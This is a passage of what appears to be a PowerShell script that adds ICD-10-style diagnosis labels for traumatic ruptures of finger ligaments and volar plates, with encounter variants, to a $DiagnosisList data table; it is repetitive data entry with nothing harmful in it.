unspecified ligament of left index finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of left index finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of unspecified ligament of left index finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of right middle finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of unspecified ligament of right middle finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of right middle finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of unspecified ligament of right middle finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of right middle finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of unspecified ligament of right middle finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of left middle finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of unspecified ligament of left middle finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of left middle finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of unspecified ligament of left middle finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of left middle finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of unspecified ligament of left middle finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of right ring finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of unspecified ligament of right ring finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of right ring finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of unspecified ligament of right ring finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of right ring finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of unspecified ligament of right ring finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of left ring finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of unspecified ligament of left ring finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of left ring finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of unspecified ligament of left ring finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of left ring finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of unspecified ligament of left ring finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of right little finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of unspecified ligament of right little finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of right little finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of unspecified ligament of right little finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of right little finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of unspecified ligament of right little finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of left little finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of unspecified ligament of left little finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of left little finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of unspecified ligament of left little finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of left little finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of unspecified ligament of left little finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of other finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of unspecified ligament of other finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of other finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of unspecified ligament of other finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of other finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of unspecified ligament of other finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of unspecified finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of unspecified ligament of unspecified finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of unspecified finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of unspecified ligament of unspecified finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of unspecified finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of unspecified ligament of unspecified finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of right index finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of collateral ligament of right index finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of right index finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of collateral ligament of right index finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of right index finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of collateral ligament of right index finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of left index finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of collateral ligament of left index finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of left index finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of collateral ligament of left index finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of left index finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of collateral ligament of left index finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of right middle finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of collateral ligament of right middle finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of right middle finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of collateral ligament of right middle finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of right middle finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of collateral ligament of right middle finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of left middle finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of collateral ligament of left middle finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of left middle finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of collateral ligament of left middle finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of left middle finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of collateral ligament of left middle finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of right ring finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of collateral ligament of right ring finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of right ring finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of collateral ligament of right ring finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of right ring finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of collateral ligament of right ring finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of left ring finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of collateral ligament of left ring finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of left ring finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of collateral ligament of left ring finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of left ring finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of collateral ligament of left ring finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of right little finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of collateral ligament of right little finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of right little finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of collateral ligament of right little finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of right little finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of collateral ligament of right little finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of left little finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of collateral ligament of left little finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of left little finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of collateral ligament of left little finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of left little finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of collateral ligament of left little finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of other finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of collateral ligament of other finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of other finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of collateral ligament of other finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of other finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of collateral ligament of other finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of unspecified finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of collateral ligament of unspecified finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of unspecified finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of collateral ligament of unspecified finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of unspecified finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of collateral ligament of unspecified finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of palmar ligament of right index finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of palmar ligament of right index finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of palmar ligament of right index finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of palmar ligament of right index finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of palmar ligament of right index finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of palmar ligament of right index finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of palmar ligament of left index finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of palmar ligament of left index finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of palmar ligament of left index finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of palmar ligament of left index finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of palmar ligament of left index finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of palmar ligament of left index finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of palmar ligament of right middle finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of palmar ligament of right middle finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of palmar ligament of right middle finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of palmar ligament of right middle finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of palmar ligament of right middle finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of palmar ligament of right middle finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of palmar ligament of left middle finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of palmar ligament of left middle finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of palmar ligament of left middle finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of palmar ligament of left middle finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of palmar ligament of left middle finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of palmar ligament of left middle finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of palmar ligament of right ring finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of palmar ligament of right ring finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of palmar ligament of right ring finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of palmar ligament of right ring finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of palmar ligament of right ring finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of palmar ligament of right ring finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of palmar ligament of left ring finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of palmar ligament of left ring finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of palmar ligament of left ring finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of palmar ligament of left ring finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of palmar ligament of left ring finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of palmar ligament of left ring finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of palmar ligament of right little finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of palmar ligament of right little finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of palmar ligament of right little finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of palmar ligament of right little finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of palmar ligament of right little finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of palmar ligament of right little finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of palmar ligament of left little finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of palmar ligament of left little finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of palmar ligament of left little finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of palmar ligament of left little finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of palmar ligament of left little finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of palmar ligament of left little finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of palmar ligament of other finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of palmar ligament of other finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of palmar ligament of other finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of palmar ligament of other finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of palmar ligament of other finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of palmar ligament of other finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of palmar ligament of unspecified finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of palmar ligament of unspecified finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of palmar ligament of unspecified finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of palmar ligament of unspecified finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of palmar ligament of unspecified finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of palmar ligament of unspecified finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of volar plate of right index finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of volar plate of right index finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of volar plate of right index finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of volar plate of right index finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of volar plate of right index finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of volar plate of right index finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of volar plate of left index finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of volar plate of left index finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of volar plate of left index finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of volar plate of left index finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of volar plate of left index finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of volar plate of left index finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of volar plate of right middle finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of volar plate of right middle finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of volar plate of right middle finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of volar plate of right middle finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of volar plate of right middle finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of volar plate of right middle finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of volar plate of left middle finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of volar plate of left middle finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of volar plate of left middle finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of volar plate of left middle finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of volar plate of left middle finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of volar plate of left middle finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of volar plate of right ring finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of volar plate of right ring finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of volar plate of right ring finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of volar plate of right ring finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of volar plate of right ring finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of volar plate of right ring finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of volar plate of left ring finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of volar plate of left ring finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of volar plate of left ring finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of volar plate of left ring finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of volar plate of left ring finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of volar plate of left ring finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of volar plate of right little finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of volar plate of right little finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of volar plate of right little finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of volar plate of right little finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of volar plate of right little finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of volar plate of right little finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of volar plate of left little finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of volar plate of left little finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of volar plate of left little finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of volar plate of left little finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of volar plate of left little finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of volar plate of left little finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of volar plate of other finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of volar plate of other finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of volar plate of other finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of volar plate of other finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of volar plate of other finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of volar plate of other finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of volar plate of unspecified finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of volar plate of unspecified finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of volar plate of unspecified finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of volar plate of unspecified finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of volar plate of unspecified finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of volar plate of unspecified finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of right index finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of other ligament of right index finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of right index finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of other ligament of right index finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of right index finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of other ligament of right index finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of left index finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of other ligament of left index finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of left index finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of other ligament of left index finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of left index finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of other ligament of left index finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of right middle finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of other ligament of right middle finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of right middle finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of other ligament of right middle finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of right middle finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of other ligament of right middle finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of left middle finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of other ligament of left middle finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of left middle finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of other ligament of left middle finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of left middle finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of other ligament of left middle finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of right ring finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of other ligament of right ring finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of right ring finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of other ligament of right ring finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of right ring finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of other ligament of right ring finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of left ring finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of other ligament of left ring finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of left ring finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of other ligament of left ring finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of left ring finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of other ligament of left ring finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of right little finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of other ligament of right little finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of right little finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of other ligament of right little finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of right little finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of other ligament of right little finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of left little finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of other ligament of left little finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of left little finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of other ligament of left little finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of left little finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of other ligament of left little finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of other finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of other ligament of other finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of other finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of other ligament of other finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of other finger at metacarpophalangeal 